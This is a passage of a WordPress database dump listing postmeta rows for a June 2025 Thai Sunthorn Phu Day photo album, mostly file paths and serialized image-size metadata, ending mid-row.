(4033,1447,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_25.jpg'),
(4034,1447,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_25.jpg\";s:8:\"filesize\";i:285886;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_25-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15802;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_25-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127880;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7951;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_25-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79523;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_25-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20404;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4035,1448,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_26.jpg'),
(4036,1448,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_26.jpg\";s:8:\"filesize\";i:280262;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_26-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15468;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_26-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125093;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7767;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_26-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77786;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_26-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20203;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4037,1449,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_27.jpg'),
(4038,1449,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_27.jpg\";s:8:\"filesize\";i:404739;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_27-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15389;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_27-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121511;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8076;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_27-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74705;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_27-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:231177;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_27-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19767;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4039,1451,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_28.jpg'),
(4040,1450,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_29.jpg'),
(4041,1451,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_28.jpg\";s:8:\"filesize\";i:424595;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_28-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16527;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_28-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128688;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_28-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7954;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_28-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80003;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_28-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:244676;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_28-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21362;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4042,1450,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_29.jpg\";s:8:\"filesize\";i:470310;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_29-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18725;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_29-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145342;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9778;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_29-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90186;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_29-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:272416;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_29-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24620;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4043,1452,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_30.jpg'),
(4044,1452,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_30.jpg\";s:8:\"filesize\";i:462355;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_30-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17932;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_30-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141017;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9544;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_30-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87233;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_30-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:266591;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_30-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23631;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4045,1453,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_31.jpg'),
(4046,1453,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_31.jpg\";s:8:\"filesize\";i:476562;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_31-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18133;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_31-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145247;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9170;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_31-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89858;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_31-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:275025;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_31-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23865;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4047,1454,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_32.jpg'),
(4048,1454,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_32.jpg\";s:8:\"filesize\";i:478879;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_32-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18945;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_32-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146991;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_32-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10082;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_32-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91590;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_32-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:277744;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_32-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24613;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4049,1455,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_33.jpg'),
(4050,1455,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:66:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_33.jpg\";s:8:\"filesize\";i:422289;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_33-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16149;}s:5:\"large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_33-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128050;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7940;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_33-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79446;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_33-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:243229;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:66:\"LINE_ALBUM_วันสุนทรภู่_250626_33-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20707;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4052,1421,'_thumbnail_id','1422'),
(4053,1421,'_edit_last','1'),
(4054,1421,'title_style','default'),
(4055,1421,'_title_style','field_5d1a0217cf408'),
(4056,1421,'related',''),
(4057,1421,'_related','field_603b51c3e183e'),
(4058,1456,'title_style','default'),
(4059,1456,'_title_style','field_5d1a0217cf408'),
(4060,1456,'related',''),
(4061,1456,'_related','field_603b51c3e183e'),
(4062,1457,'_edit_lock','1750922037:1'),
(4063,1458,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-1.jpg'),
(4064,1458,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-1.jpg\";s:8:\"filesize\";i:523642;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18677;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155157;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9024;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95036;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:298200;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_12-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24102;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4065,1459,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3-1.jpg'),
(4066,1459,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3-1.jpg\";s:8:\"filesize\";i:680430;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_3-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17922;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_3-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184577;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8343;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_3-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_3-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:372627;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_3-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23389;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4067,1460,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1-1.jpg'),
(4068,1460,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1-1.jpg\";s:8:\"filesize\";i:615126;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_1-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18836;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_1-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172180;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9642;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_1-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102281;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_1-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:340998;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_1-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24307;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"captio